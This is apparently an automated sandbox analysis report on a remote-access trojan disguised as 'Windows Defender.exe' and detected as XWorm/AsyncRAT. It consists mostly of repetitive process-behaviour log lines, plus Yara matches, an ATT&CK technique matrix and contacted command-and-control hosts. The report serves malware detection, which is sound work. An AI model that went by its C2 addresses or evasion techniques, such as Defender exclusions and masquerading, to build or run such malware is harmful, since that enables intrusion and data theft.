                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Windows Defender.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Windows Defender.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Windows Defender.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Windows Defender.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Windows Defender.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Windows Defender.exe, 00000000.00000002.3476665704.00000000010BD000.00000004.00000020.00020000.00000000.sdmp, Windows Defender.exe, 00000000.00000002.3491418383.000000001BD45000.00000004.00000020.00020000.00000000.sdmp, Windows Defender.exe, 00000000.00000002.3491418383.000000001BDB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: Windows Defender.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Windows Defender.exe PID: 4144, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: Windows Defender.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Windows Defender.exe PID: 4144, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      Scheduled Task/Job                      		12
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping541
                      Security Software Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		1
                      DLL Side-Loading                      		21
                      Registry Run Keys / Startup Folder                      		151
                      Virtualization/Sandbox Evasion                      		Security Account Manager151
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		12
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSync23
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528948 Sample: Windows Defender.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 42 ip-api.com 2->42 44 22.ip.gl.ply.gg 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 21 other signatures 2->56 8 Windows Defender.exe 15 6 2->8         started        13 Windows Defender.exe 2->13         started        15 Windows Defender.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 46 ip-api.com 208.95.112.1, 49743, 80 TUT-ASUS United States 8->46 48 22.ip.gl.ply.gg 147.185.221.22, 49989, 49991, 49993 SALSGIVERUS United States 8->48 38 C:\Users\user\...\Windows Defender.exe, PE32 8->38 dropped 60 Protects its processes via BreakOnTermination flag 8->60 62 Adds a directory exclusion to Windows Defender 8->62 19 powershell.exe 23 8->19         started        22 powershell.exe 22 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 40 C:\Users\user\...\Windows Defender.exe.log, CSV 13->40 dropped file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 19->58 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Windows Defender.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      Windows Defender.exe100%AviraTR/Spy.Gen
                      Windows Defender.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Windows Defender.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Local\Windows Defender.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Windows Defender.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      22.ip.gl.ply.gg
                      		147.185.221.22
                      		truetrue
                        		unknown
                        s-part-0017.t-0009.t-msedge.net
                        		13.107.246.45
                        		truefalse
                          		unknown
                          ip-api.com
                          		208.95.112.1
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            22.ip.gl.ply.ggtrue
                              		unknown
                              http://ip-api.com/line/?fields=hostingfalse
                              • URL Reputation: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
